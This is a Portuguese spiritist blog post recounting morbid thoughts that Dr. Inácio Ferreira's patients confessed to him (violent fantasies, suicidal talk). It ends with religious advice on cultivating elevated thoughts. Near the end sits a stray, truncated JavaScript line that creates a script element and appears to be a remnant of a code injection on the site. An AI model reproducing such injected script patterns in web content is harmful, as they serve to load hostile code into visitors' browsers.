Pensamentos e sonhos doentios

O Dr. Inácio Ferreira – médico e psiquiatra -, que durante 50 anos dirigiu o Sanatório Espírita de Uberaba- MG, expõe no capítulo, “pensamentos mórbidos”, no livro “Dr. Inácio, ele mesmo!”, alguns desabafos que o impressionaram: “

1 -” eu me imagino esganando fulano…”

2 -” meus sonhos são de pura devassidão…”

3 -” em meus devaneios sonho em matar aquele imbecil…”

4 -” já pensei em contratar alguém para dar cabo daquela mulher…”

A situação era difícil. Muitos deles choravam e falavam em suicídio, e outros já estavam entregues ao alcoolismo. Certa vez um pedófilo disse-me que estava com a arma engatilhada em casa, e eu seria a última esperança.

Conversei, conversei,…receitei medicamentos… falei em Deus, em imortalidade, na consequência do suicídio; ele foi embora, agradecido.

E os que, mentalmente, planejavam golpes financeiros contra os familiares. E os que aparentando ser sociáveis, mal conseguiam conter a agressividade, e havia também os egoístas ao extremo – egoísmo é uma das piores doenças que conheço! Gente que confessava mudar de calçada para não dar esmolas aos mendigos.

A morbidez dos nossos pensamentos fala de nossa grande miséria espiritual! Só mesmo apelando para a misericórdia do Senhor, pedindo forças para que, pelo menos, a tentação nunca nos saia da esfera dos pensamentos.

Comentários: o pensamento vem da memória; memória negativa implica em pensamento negativo. É preciso enriquecer a memória com novas ideias pela leitura de livros edificantes, pela prática religiosa, pelo exercício do bem em grupos de ajuda humanitária, pelo cultivo de ideal superior, pela audição de palestras elevadas e reflexão. Os pensamentos negativos diminuirão, enfraquecerão, e pensamentos elevados ocuparão sua memória num processo lento e gradativo. Persevere até que não lhe incomodem mais, e você começará a sentir uma alegria que nunca sentiu.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário